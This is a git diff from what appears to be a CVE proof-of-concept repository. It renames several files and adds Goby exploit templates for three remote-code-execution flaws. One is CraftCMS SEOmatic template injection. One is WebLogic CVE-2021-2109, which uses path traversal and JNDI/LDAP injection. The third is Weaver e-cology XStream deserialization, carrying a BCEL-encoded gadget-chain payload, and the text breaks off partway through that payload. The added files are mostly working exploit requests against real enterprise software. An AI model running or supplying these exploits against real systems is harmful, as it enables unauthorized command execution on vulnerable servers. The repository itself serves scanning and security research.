diff --git a/2020/CVE-2020-8209/poc/xray/CVE-2020-8209.yaml b/2020/CVE-2020-8209/poc/xray/CVE-2020-8209.yml
similarity index 100%
rename from 2020/CVE-2020-8209/poc/xray/CVE-2020-8209.yaml
rename to 2020/CVE-2020-8209/poc/xray/CVE-2020-8209.yml
diff --git a/2020/CVE-2020-8515/poc/xray/CVE-2020-8515.yaml b/2020/CVE-2020-8515/poc/xray/CVE-2020-8515.yml
similarity index 100%
rename from 2020/CVE-2020-8515/poc/xray/CVE-2020-8515.yaml
rename to 2020/CVE-2020-8515/poc/xray/CVE-2020-8515.yml
diff --git a/2020/CVE-2020-9376/poc/xray/CVE-2020-9376.yaml b/2020/CVE-2020-9376/poc/xray/CVE-2020-9376.yml
similarity index 100%
rename from 2020/CVE-2020-9376/poc/xray/CVE-2020-9376.yaml
rename to 2020/CVE-2020-9376/poc/xray/CVE-2020-9376.yml
diff --git a/2020/CVE-2020-9483/poc/xray/CVE-2020-9483.yaml b/2020/CVE-2020-9483/poc/xray/CVE-2020-9483.yml
similarity index 100%
rename from 2020/CVE-2020-9483/poc/xray/CVE-2020-9483.yaml
rename to 2020/CVE-2020-9483/poc/xray/CVE-2020-9483.yml
diff --git a/2020/CVE-2020-9496/poc/xray/CVE-2020-9496.yaml b/2020/CVE-2020-9496/poc/xray/CVE-2020-9496.yml
similarity index 100%
rename from 2020/CVE-2020-9496/poc/xray/CVE-2020-9496.yaml
rename to 2020/CVE-2020-9496/poc/xray/CVE-2020-9496.yml
diff --git a/2020/CVE-2020-9597/poc/goby/CVE-2020-9597.json b/2020/CVE-2020-9597/poc/goby/CVE-2020-9597.json
new file mode 100644
index 000000000..20a1c409f
--- /dev/null
+++ b/2020/CVE-2020-9597/poc/goby/CVE-2020-9597.json
@@ -0,0 +1,115 @@
+{
+ "Name": "CraftCMS Seomatic RCE CVE-2020-9597",
+ "Level": "3",
+ "Tags": [
+ "rce"
+ ],
+ "GobyQuery": "(title==\"Welcome to Craft CMS\" | body=\"href=\\\"http://craftcms.com/\\\"\" | body=\"SEOmatic\" | header=\"Craft CMS\" | header=\"Craft CMS, SEOmatic\")",
+ "Description": "The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.",
+ "Product": "craftcms",
+ "Homepage": "https://craftcms.com/",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9757"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "Name": "cmd",
+ "Type": "input",
+ "Value": "craft.app.view.evaluateDynamicContent('phpinfo();')"
+ }
+ ],
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/actions/seomatic/meta-container/meta-link-container/?uri={{5*'5'}}",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": [
+ "r1|rand|int|2",
+ "r2|rand|int|2"
+ ]
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "MetaLinkContainer",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "canonical",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "25",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/actions/seomatic/meta-container/meta-link-container/?uri=%7B%7B{{{cmd}}}%7D%7D",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-11 20:45:35",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
diff --git a/2020/CVE-2020-14181/poc/goby/wait_to_be_added b/2020/CVE-2020-9597/poc/nuclei/wait_to_be_added
similarity index 100%
rename from 2020/CVE-2020-14181/poc/goby/wait_to_be_added
rename to 2020/CVE-2020-9597/poc/nuclei/wait_to_be_added
diff --git a/2020/CVE-2020-26413/poc/goby/wait_to_be_added b/2020/CVE-2020-9597/poc/oneliner/wait_to_be_added
similarity index 100%
rename from 2020/CVE-2020-26413/poc/goby/wait_to_be_added
rename to 2020/CVE-2020-9597/poc/oneliner/wait_to_be_added
diff --git a/2020/CVE-2020-27986/poc/goby/wait_to_be_added b/2020/CVE-2020-9597/poc/others/wait_to_be_added
similarity index 100%
rename from 2020/CVE-2020-27986/poc/goby/wait_to_be_added
rename to 2020/CVE-2020-9597/poc/others/wait_to_be_added
diff --git a/2020/CVE-2020-8193/poc/goby/wait_to_be_added b/2020/CVE-2020-9597/poc/pocsuite2/wait_to_be_added
similarity index 100%
rename from 2020/CVE-2020-8193/poc/goby/wait_to_be_added
rename to 2020/CVE-2020-9597/poc/pocsuite2/wait_to_be_added
diff --git a/2021/CVE-2021-21402/poc/goby/wait_to_be_added b/2020/CVE-2020-9597/poc/pocsuite3/wait_to_be_added
similarity index 100%
rename from 2021/CVE-2021-21402/poc/goby/wait_to_be_added
rename to 2020/CVE-2020-9597/poc/pocsuite3/wait_to_be_added
diff --git a/2021/CVE-2021-21975/poc/goby/wait_to_be_added b/2020/CVE-2020-9597/poc/xray/wait_to_be_added
similarity index 100%
rename from 2021/CVE-2021-21975/poc/goby/wait_to_be_added
rename to 2020/CVE-2020-9597/poc/xray/wait_to_be_added
diff --git a/2020/CVE-2020-9757/poc/xray/CVE-2020-9757.yaml b/2020/CVE-2020-9757/poc/xray/CVE-2020-9757.yml
similarity index 100%
rename from 2020/CVE-2020-9757/poc/xray/CVE-2020-9757.yaml
rename to 2020/CVE-2020-9757/poc/xray/CVE-2020-9757.yml
diff --git a/2021/CVE-2021-2109/poc/goby/Weblogic LDAP Internet RCE CVE-2021-2109.json b/2021/CVE-2021-2109/poc/goby/Weblogic LDAP Internet RCE CVE-2021-2109.json
new file mode 100644
index 000000000..da5fbb100
--- /dev/null
+++ b/2021/CVE-2021-2109/poc/goby/Weblogic LDAP Internet RCE CVE-2021-2109.json
@@ -0,0 +1,94 @@
+{
+ "Name": "Weblogic LDAP RCE CVE-2021-2109",
+ "Level": "3",
+ "Tags": [
+ "RCE"
+ ],
+ "GobyQuery": "app=\"Oracle-Weblogic_interface_7001\" || app=\"Oracle-BEA-WebLogic-Server\" || title==\"Error 404--Not Found\"",
+ "Description": "2021年1月20日,绿盟科技监测发现Oracle官方发布了2021年1月关键补丁更新公告CPU(Critical Patch Update),共修复了329个不同程度的漏洞,其中包括7个影响WebLogic的严重漏洞(CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756),未经身份验证的攻击者可通过此次的漏洞实现远程代码执行。CVSS评分均为9.8,利用复杂度低。建议用户尽快采取措施,对上述漏洞进行防护。\n\nWebLogic Server 10.3.6.0.0\nWebLogic Server 12.1.3.0.0\nWebLogic Server 12.2.1.3.0\nWebLogic Server 12.2.1.4.0\nWebLogic Server 14.1.1.0.0",
+ "Product": "WebLogicd",
+ "Homepage": "https://www.oracle.com/middleware/technologies/weblogic.html",
+ "Author": "AndU",
+ "Impact": "Internet",
+ "Recommandation": "Internet",
+ "References": [
+ "Internet"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "Cmd",
+ "type": "input",
+ "value": "whoami",
+ "show": ""
+ },
+ {
+ "name": "Ldap",
+ "type": "input",
+ "value": "ldap://xxx.xxx.xxx;xxx:1389",
+ "show": ""
+ },
+ {
+ "name": "Cookie",
+ "type": "input",
+ "value": "ADMINCONSOLESESSION=xxxxx",
+ "show": ""
+ }
+
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/console/css/%252e%252e%252f/consolejndi.portal?",
+ "follow_redirect": true,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "JNDI",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/console/css/%252e%252e%252f/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{{{Ldap}}}/Basic/WeblogicEcho;AdminServer%22)",
+ "follow_redirect": true,
+ "header": {
+ "cmd": "{{{Cmd}}}",
+ "Cookie":"{{{Cookie}}}"
+ },
+ "data_type": "text",
+ "data": ""
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ }
+ ],
+ "PostTime": "2021-01-22 13:55:45",
+ "GobyVersion": "1.8.237"
+}
\ No newline at end of file
diff --git a/2021/CVE-2021-22205/poc/goby/wait_to_be_added b/2021/CVE-2021-2109/poc/nuclei/wait_to_be_added
similarity index 100%
rename from 2021/CVE-2021-22205/poc/goby/wait_to_be_added
rename to 2021/CVE-2021-2109/poc/nuclei/wait_to_be_added
diff --git a/2021/CVE-2021-22986/poc/goby/wait_to_be_added b/2021/CVE-2021-2109/poc/oneliner/wait_to_be_added
similarity index 100%
rename from 2021/CVE-2021-22986/poc/goby/wait_to_be_added
rename to 2021/CVE-2021-2109/poc/oneliner/wait_to_be_added
diff --git a/2021/CVE-2021-26084/poc/goby/wait_to_be_added b/2021/CVE-2021-2109/poc/others/wait_to_be_added
similarity index 100%
rename from 2021/CVE-2021-26084/poc/goby/wait_to_be_added
rename to 2021/CVE-2021-2109/poc/others/wait_to_be_added
diff --git a/2021/CVE-2021-3019/poc/goby/wait_to_be_added b/2021/CVE-2021-2109/poc/pocsuite2/wait_to_be_added
similarity index 100%
rename from 2021/CVE-2021-3019/poc/goby/wait_to_be_added
rename to 2021/CVE-2021-2109/poc/pocsuite2/wait_to_be_added
diff --git a/2021/CVE-2021-36260/poc/goby/wait_to_be_added b/2021/CVE-2021-2109/poc/pocsuite3/wait_to_be_added
similarity index 100%
rename from 2021/CVE-2021-36260/poc/goby/wait_to_be_added
rename to 2021/CVE-2021-2109/poc/pocsuite3/wait_to_be_added
diff --git a/2021/CVE-2021-36749/poc/goby/wait_to_be_added b/2021/CVE-2021-2109/poc/xray/wait_to_be_added
similarity index 100%
rename from 2021/CVE-2021-36749/poc/goby/wait_to_be_added
rename to 2021/CVE-2021-2109/poc/xray/wait_to_be_added
diff --git a/2021/CVE-2021-21350/poc/goby/Weaver_e_cology_OA_XStream_RCE_CVE_2021_21350.go b/2021/CVE-2021-21350/poc/goby/Weaver_e_cology_OA_XStream_RCE_CVE_2021_21350.go
new file mode 100644
index 000000000..a748b0305
--- /dev/null
+++ b/2021/CVE-2021-21350/poc/goby/Weaver_e_cology_OA_XStream_RCE_CVE_2021_21350.go
@@ -0,0 +1,106 @@
+package exploits
+
+import (
+ "git.gobies.org/goby/goscanner/goutils"
+)
+
+func init() {
+ expJson := `{
+ "Name": "Weaver e_cology OA XStream Remote Code Execution",
+ "Level": "3",
+ "Tags": [
+ "RCE"
+ ],
+ "GobyQuery": "app=\"Weaver-OA\"",
+ "Description": "泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识管理、数据中心、工作流管理、人力资源管理、客户与合作伙伴管理、项目管理、财务管理、资产管理功能的协同商务平台。泛微e-cology OA系统存在远程代码执行漏洞。该漏洞存在于泛微协同管理应用平台OA系统的BeanShell组件中,该组件为系统自带且允许未授权访问。攻击者通过调用BeanShell组件的问题接口可直接在目标服务器上执行任意命令。",
+ "Product": "Weaver e-cology",
+ "Homepage": "https://www.weaver.com.cn/e9",
+ "Author": "flystart",
+ "Impact": "攻击者可利用此漏洞造成远程代码执行
",
+ "Recommandation": "官方已发布针对此漏洞的修复补丁,受影响用户也可采取下列防护措施对此漏洞进行临时防护。
",
+ "References": [
+ "https://mp.weixin.qq.com/s/YcCydpGNiCrB0F_w6D5eRw"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "cmd",
+ "type": "input",
+ "value": "whoami"
+ }
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/services%20/WorkflowServiceXml",
+ "follow_redirect": false,
+ "header": {
+ "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE",
+ "Content-Type": "text/xml;charset=UTF-8"
+ },
+ "data_type": "text",
+ "data": "\n \n \n <java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
<comparator class='javafx.collections.ObservableList$1'/>
</default>
<int>3</int>
<com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
<dataHandler>
<dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
<contentType>text/plain</contentType>
<is class='java.io.SequenceInputStream'>
<e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
<iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>
<names class='java.util.AbstractList$Itr'>
<cursor>0</cursor>
<lastRet>-1</lastRet>
<expectedModCount>0</expectedModCount>
<outer-class class='java.util.Arrays$ArrayList'>
<a class='string-array'>
<string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$5bW$TW$U$fe$G$S$ced$Y$E$83$5cF$ad$a2$z$gT$aei$C$Ek$8d$40$wm$40$rT$8b$da$daar$m$Da$s$ceL$80$5e$ed$fd$7e$b1$7d$b3$7f$c0$d7$f6et$b5$ab$5d$7d$f6$a5k$b5$P$ed$af$a9$ddg$S$94$I$ad$85$b5$f6$9c$7d$fb$ce$be$9c$b3O$ee$fd$fd$e3$_$A$9e$c6$b7$K$o$YQ0$8a$94$mc2N$wx$G$a7d$3c$cbpZ$BC$9a$e1$8c$82qL$I$cbI$n$c9$c8xN$7c$cf$w$98$c2$f3$82$bc$m$p$cb0$zcFA$U$e7d$9cg$b8$mcVFNA$3b$e6$Y$5eTp$R$97$E$f3$92X$cd$x$b8$8c$x$K$f6$e2$aa$8c$97$c5$f7$VA$ae$J$f2$aa$M$9daAA7$M$86$bc$84$86$93$a6ez$a7$q$d4$c7z$$J$I$8d$dby$$$a19kZ$7c$a6$bc$ba$c0$9d9$7d$a1H$92$a6$9c$a7$h$x$d3z$v$e0$c9$952$60$a0$c5$Z$86E$K$8fb$a2$40$IZ$82$92$b3$cb$8e$c13$a6$f0$8bL$ae$e9$c5$bee$7dMW$RC$P$c3$92$8a$CL$V$cbX$91p$d4$b0W$fb$M$bdl$U$ec$3e$8b$7b$eb$b6$b3$d2W4$5d$8f$5b$7dsF$vg$h$x$dc$a3PV$Y$8a$wVaI$d8$bd$c4$bd$f1$b2$e3p$cb$9b$e5$d7$cb$dc$f5$uZ$B$df_$d4$ad$a5$fe$f1$a2$ee$ba$wl$94$q$b4$3c$U$9f$5bX$e6$86G$f1$aa$b8$OG$85$LOE$Z$c2$f7$9a$c3$dd$92m$b9$3c$a3$hz$9e$M$d6$b0N$v$a9$d8$c0k$w$5e$c7$h$94$D$edy$c91$3d$eeH$d8$V$80$9av$ff$a6$a0$x94$9a$i$9aH$a7$T$89$c1$d1$91$c9$c1d$3c$93$i$l$8fg$86$t$e3$99$c1tb$m$a1$e2M$bcU$B9$cbi$H$a7$s$b2$9c$e7$98$d6$92$E6$cb$X$b9$T$A$s$8c$RC$8f$8f$M$e9$7cX$l$k$d0$e3F$o$c9$87$f3I$p$b1$98L$O$c4$f3$86$8a$b7q$83$w$R$80$94$3d$b3$d8$9f3t$cb$e2$O$c3$3b$w$de$c5$7b$w$de$c7$H$w$3e$c4G$M$l$ab$f8$E$9f$8a$da$7f$s$a1$eejZ$c5$e7$f8B$c5$97$f8J$c5$d7$b8$v$B$SZ$l$863$b9a$f0$92g$da$96$8ao$d0C$e7A$b4OB$e7C$L$87$_$W$a9$96$fd$d3$dc$x$d8t$80$3a$b6$ab2$s$_$e6k$b2$9c$x8$94$3a$9d$o$a3$d2$baM$7eO$ac$t$fb$a8$d5$98$846$d1d$db$f2$f8$86$X44kW$ea$a6$d5$98oQ$J$9f$j$VT$f7$o$z$C$89$84$eeX$f6$d1$ca$8fmC$i$ab$f4j3$bf$d3$3b$f8$5c$d9$e6$b3$V$a5$b6B$E$d7$60Zk$f6$K$5d$86$d1$adX$953Y$83U$V$f5l$XI$90EM$wi$b4n$_$D$Z4$91A$ae$5c$e2$8eQ$b1j$n$7e$82$T$e3$f0$7c$b5$p$bd$8f$c9$bf$a6$81$C$d2$e5$5e$da0$b8$eb$9a$c1$Q$I$c5$$$8b$nQO$c8$S$8e$ec$90$cc$8e$91$87$d7$c5U$a1$O$ed$b4$3b$c1$v$ae$a7$3b$9e$7b$c9$f4$K$ffbty$f3$b4$H$d2$d9$b2$e5$99$ab$E$a8P$i$P$98$b6$9a$a2T$c5$a2$97ny$c1$ad$5e$b2$b6$d8T$cfvx$ca$8bop$83$a6$d1c$cas$de$b1E$z$c6j$a2$a9$Ki2P4SV$a9$ec$91$t$d7W$e9flFD$d3b$8b$82$dc$3bc$3b$wD1$d4$b2$cb$tx$d1$5c$adL$97$ff$Ii$eb$cd$tLV$d0$dd$Z$ba0$c1$q$a7$82$85$ac$80$a9$bda$P2n$$$d1$c2$Lf$fa$9c$a3$h$i$87p$94$9e$m$f1$t$d1$3fMj$a2$c7$88$f9$k$Nh$q$e9_$c7$ee$40$ba$8b$3a$l$f5$d1$90$8fp$f6x$b4$a1$feg0$l$f2$f4$J$89V$R$l$caL$af$8fF$lj$b4$c9$c7$aeTH$L$91e$b3$W$oiK$w$ac$85I$Z$dd$5duJ5h$NZ$b8$ea$f7$x$a2$v$a6$b1h$ab$8f$3d$C$o$da$W$o$ab$f9$fah$7bN$98$ca$9a$dcK$82$I$J$3ar$81y$7b$w$a2E$a2$9d$3e$b4$5b$Y$f9$J$7b$e7$efb$9f$Wi$e9$f2$b1$df$c7$T$3e$O$dc$c1$c1$uq$87R$8a$c64$c5$c7$e1$5bh$U$df$to$p$i$7d$8a$b6$b9$N9$7b$dc$c7$91$l$u$cf$Q$7e$c3$ef$f4$o$d6$e18e$3a$83V$a2$wIw$a1$F$cd$d8G$b4$h$bb$R$a7$d7w$94ti$ec$c1$F$b4A$a7$f7$b6$80$O$9a$ee$9d$b8$J$N$df$91$e5$5d$ec$t$ac$$B$3b$80$3fp$Q$7f$e20N$Q$da2$c2$f7q$P$8d$M$bd$M$7d$M$fd$M$D$M$83$B$a5$f5P$40$e3$8c$7e3H$c4$dd$a7$98$fe$87i$5d$c0$c5$efS$dc$e4$d5$L$f1$U$tB$e4$9b$a4$j$eb0$fc$P$y$j$c8$d7$88$I$A$A
</string>
</a>
</outer-class>
</names>
<processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'>
<parent class='sun.misc.Launcher$ExtClassLoader'>
</parent>
<package2certs class='hashtable'/>
<classes defined-in='java.lang.ClassLoader'/>
<defaultDomain>
<classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/>
<principals/>
<hasAllPerm>false</hasAllPerm>
<staticPermissions>false</staticPermissions>
<key>
</key>
</defaultDomain>
<domains class="java.util.Collections$SynchronizedSet" serialization="custom">
<java.util.Collections_-SynchronizedCollection>
<default>
<c class="set"></c>
<mutex class="java.util.Collections$SynchronizedSet" reference="../../.."/>
</default>
</java.util.Collections_-SynchronizedCollection>
</domains> <packages/>
<nativeLibraries/>
<assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/>
<defaultAssertionStatus>false</defaultAssertionStatus>
<classes/>
<ignored__packages>
<string>java.</string>
<string>javax.</string>
<string>sun.</string>
</ignored__packages>
<repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'>
<__path>
<paths/>
<class__path>.</class__path>
</__path>
<__loadedClasses/>
</repository>
<deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/>
</processorCL>
</iterator>
<type>KEYS</type>
</e>
<in class='java.io.ByteArrayInputStream'>
<buf></buf>
<pos>0</pos>
<mark>0</mark>
<count>0</count>
</in>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
<com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
</java.util.PriorityQueue>
</java.util.PriorityQueue>\n 2\n \n \n\n"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "62962DAA55198E163F6CC3F7E3F1A505",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/services%20/WorkflowServiceXml",
+ "follow_redirect": false,
+ "header": {
+ "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE",
+ "Content-Type": "text/xml;charset=UTF-8",
+ "Referer": "5c8ca382ae7a70a3c56e7d6c5f6603dc{{{cmd}}}"
+ },
+ "data_type": "text",
+ "data": "\n \n \n <java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
<comparator class='javafx.collections.ObservableList$1'/>
</default>
<int>3</int>
<com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
<dataHandler>
<dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
<contentType>text/plain</contentType>
<is class='java.io.SequenceInputStream'>
<e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
<iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>
<names class='java.util.AbstractList$Itr'>
<cursor>0</cursor>
<lastRet>-1</lastRet>
<expectedModCount>0</expectedModCount>
<outer-class class='java.util.Arrays$ArrayList'>
<a class='string-array'>
<string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dU$ebS$TW$U$ff$z$q$dc$cd$b2$I$E$Q$a2U$b1$z$g$E$S$K$f2$K$d6$8a$3c$w6$m$rT$Em$ed$b2$b9$c0B$d8$8d$fb$A$fa$7e$bf$9f3$fd$e4$l$d0$f1$b3_V$a7$9dv$3a$d3$_N$db$P$ed$3fTz$ee$s$I1$b46$99$b9$7b$cf$f3$fe$ce9$f7$9c$fb$db$df$3f$fc$M$e0$y$beU$Q$c1$80$82A$M$89$r$rcX$c19$3c$x$e3$3c$c3s$K$Y$$0$8c$u$b8$88Q$a19$s8$e32$s$c4$f7y$F$970$v$96$cb2$5e$60H$cb$98b$98$96qE$c6$8c$82F$bc$c80$ab$m$839A$bc$qvW$V$cc$e3$9a$82$W$y$c8X$U$df$ebb$b9$n$96$97e$bc$a2$m$8a$9b$M$af$wx$g$g$c3$92$84$aas$86i$b8$e7$rT$c6$db$afJ$I$8dZY$$$a16m$98$7c$da$dbX$e2$f6$9c$b6$94$pNM$c6$d5$f4$f5$v$z$l$d0dJ$f0$Zt$C$cf$90$rl$E$8c$d0$90k$JJ$c6$f2l$9dO$Y$c2N$k$bf6$93X$d365$V$a7$Rg$e0$w$96$b1$a2b$V$86$84$d3$ba$b5$91$d05O_$b5$S$sw$b7$y$7b$3d$913$i$97$9b$899$3d$9f$b1$f4u$ee$S$92u$865$V$eb$c8I$a8_$e1$ee$a8g$db$dctg$f9$z$8f$3b$$$81$V$ee$939$cd$5cI$8e$e64$c7Q$b1$BSB$dd$k$fb$ca$d2$g$d7$5d$82$ab$c2B$5e$c5$z$d8$w$i$d8d$7b$d3$e6N$de2$j$3e$a1$e9Z$96$d0$b9$f0$u$o$V$9b$d8R$b1$8d$d7$qD$e8$ccy$dbp9$e9$l$K$9c$gVr$97$n$84$978Y$da$r$tf$5c$db0W$q$b0Y$be$ccm$nl$ed$d3$Hu$adw$b0G$e3$D$da$40$b7$d6$ab$f7$f5$f3$81l$bf$de$b7$dc$df$df$dd$9b$rl$af$e3$N$8a0p$e2$b9F$$$99$d15$d3$e46$c3$9b$w$de$c2$db$w$de$c1$bb$w$de$c3$fb$M$l$a8$f8$Q$l$89$9c$7e$y$a1$e2$c6$88$8aO$f0$a9$8a$cf$f0$b9$8a$_$f0$a5$E$a8$f8$K_Kh$d8$c34$be$ad$f3$bckX$a6$8ao$Q$a7$8aSi$q$b4$ec$v$d8$7c9GyJNqw$d5$caJh$$$XM$Y$3c$97$z$89tn$d5$a6$f0$e9$82$e8$85$b2$ec$d2$8d$f1$f6$f4$a3Z$c3$S$9aD$B$z$d3$e5$dbnP$ac$b4U$c8$5d$acD$7d$9fH$d8$i$u$a0$dc$e7h$Tp$q$b4$c5$d3$8ff$7f$b8$cc$e3p$a1$5e$bb$f1$5d8$c0$e6z$99$cd$7e$_$a5$Z$owU$86$b9i$ad$d3$3d$l$da$ef$abp$dfJ$7c$VY$ed$e5$y$ea$R$91$93B$Y$N$e5i$m$85$gR$c8xyn$eb$F$ad$3a$a2$c78$R6$cf$W$x$d2$f5$98$f8K$K$u$5c$3a$dc$j$d1u$ee8F$d0$df$a1$f8$a2$e8$ffJ$f2$y$e1$d4$B$c1$i$88$5cq$5c$cdv$9dy$c3$5d$a52$j$Eaq$f7F$H$dcY$cft$8d$N$3aN$a1s$k$SM$rA$X$d9$a2V$8e$b7$e4$U$h$a9$v$3e$d9$5e$ee$9ep$f3m$ae$d3$qyL$f83$b6$rb$j$$ASdRW$T$9aI3$ef$b9d$c9$b5$N$ba$f9$bb$88$a8$d3$f7$J$c8$bc$r$7e$a0$40$e4N$f5$i$3e$c6s$c6Fa2$fc$H$a4$fd$ddM$3e$d9$aa$e6LSC$EC$98$S$W2$D$a2$b4$83$kF$i$de$S$a3$e7_$d2M0j$f3$b4u$83q$3dgk$3a$c7I$9c$a2$a7E$fc$q$fa$d3$U$a6$b5$9d$88$efQ$85j$e2$feu$e6$k$a4$fb$a8$f0Q$Z$N$f9$I$a7$3b$a2U$95$3f$81$f9$90$a7$3a$r$daE$7c$u$d3$5d$3e$aa$7d$a8$d1$g$l$87R$a1X$884kc$n$e2$d6$a5$c2$b10$J$a3$f5E$a3TU$ac$w$W$$$da$fd$82h$8a$J$dbhC$88$c4$L$95$d1$c6$8c$d0$91cr$X1$o$c4h$ca$Ez$8d$a9H$y$S$3d$ec$a3$f96$G$7fD$cb$c2$7d$c4b$91$baV$lG$7c$i$f5$f1$c4$3d$i$8b$k$f7q$o$a5$c4XL$f1$d1z$h$d5$e2$7b$f2$O$c2$d1$t$7d$3cu$Hr$ba$c3G$db$5d$K0$84$H$f8$9d$5e$b9$K$9c$a1$Q$_$d3$bb$tFb$I$87P$87Z$i$a5$b5$N$f5$e8$r$fe$Q$g0$o$5eS4A$c3axh$a69$da$82$efp$EwI$f3$BN$90$a7c$f8$D$c7$f1$t$r$b3$83$3c$ad$n$bc$83_Q$cd$d0$c9$d0$c5$90$60H2t$H$x$ed$9f$J$d6$kF$fe$r$a2v$I$cf$ffP$ad$I$a8$9e$j$c2LV$9d$c0E$86$b3$n$b2$ed$a3$T$x$d0$ff$P$ca$d2$a5$5eU$I$A$A
</string>
</a>
</outer-class>
</names>
<processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'>
<parent class='sun.misc.Launcher$ExtClassLoader'>
</parent>
<package2certs class='hashtable'/>
<classes defined-in='java.lang.ClassLoader'/>
<defaultDomain>
<classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/>
<principals/>
<hasAllPerm>false</hasAllPerm>
<staticPermissions>false</staticPermissions>
<key>
</key>
</defaultDomain>
<domains class="java.util.Collections$SynchronizedSet" serialization="custom">
<java.util.Collections_-SynchronizedCollection>
<default>
<c class="set"></c>
<mutex class="java.util.Collections$SynchronizedSet" reference="../../.."/>
</default>
</java.util.Collections_-SynchronizedCollection>
</domains> <packages/>
<nativeLibraries/>
<assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/>
<defaultAssertionStatus>false</defaultAssertionStatus>
<classes/>
<ignored__packages>
<string>java.</string>
<string>javax.</string>
<string>sun.</string>
</ignored__packages>
<repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'>
<__path>
<paths/>
<class__path>.</class__path>
</__path>
<__loadedClasses/>
</repository>
<deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/>
</processorCL>
</iterator>
<type>KEYS</type>
</e>
<in class='java.io.ByteArrayInputStream'>
<buf></buf>
<pos>0</pos>
<mark>0</mark>
<count>0</count>
</in>
</is>
